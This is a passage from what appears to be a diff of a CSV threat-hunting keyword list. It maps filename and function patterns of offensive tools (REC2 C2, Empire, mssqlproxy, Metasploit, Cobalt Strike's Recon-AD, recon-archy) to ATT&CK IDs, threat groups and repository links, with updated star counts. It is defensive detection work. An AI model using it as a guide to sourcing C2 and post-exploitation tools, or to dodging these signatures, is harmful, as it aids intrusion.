T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*REC2 implant for Mastodon*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*REC2 implant for VirusTotal*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*rec2::modules::rec2mastodon*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*rec2_mastodon_x64.exe*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*rec2_virustotal_x64.exe*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*rec2mastodon.rs*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*rec2virustotal*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*rec2virustotal.rs*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*Receive-AgentJob*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*REC2 implant for Mastodon*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*REC2 implant for VirusTotal*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*rec2::modules::rec2mastodon*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*rec2_mastodon_x64.exe*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*rec2_virustotal_x64.exe*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*rec2mastodon.rs*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*rec2virustotal*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*rec2virustotal.rs*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*Receive-AgentJob*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*reciclador.cpp*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" "*reciclador.dll*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" "*reciclador.vcxproj*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" -"*recon_passive.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Recon-AD-*.dll*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" -"*Recon-AD-*.sln*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" -"*Recon-AD-*.vcxproj*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" -"*Recon-AD-AllLocalGroups*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" -"*Recon-AD-Domain*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" -"*Recon-AD-LocalGroups*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" -"*Recon-AD-SPNs*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" -"*Recon-AD-Users.*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" -"*recon-archy analyse*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","12","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" -"*recon-archy build*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","12","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" -"*recon-archy crawl*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","12","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" -"*recon-archy-master*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","12","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*recon_passive.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Recon-AD-*.dll*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-*.sln*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-*.vcxproj*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-AllLocalGroups*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 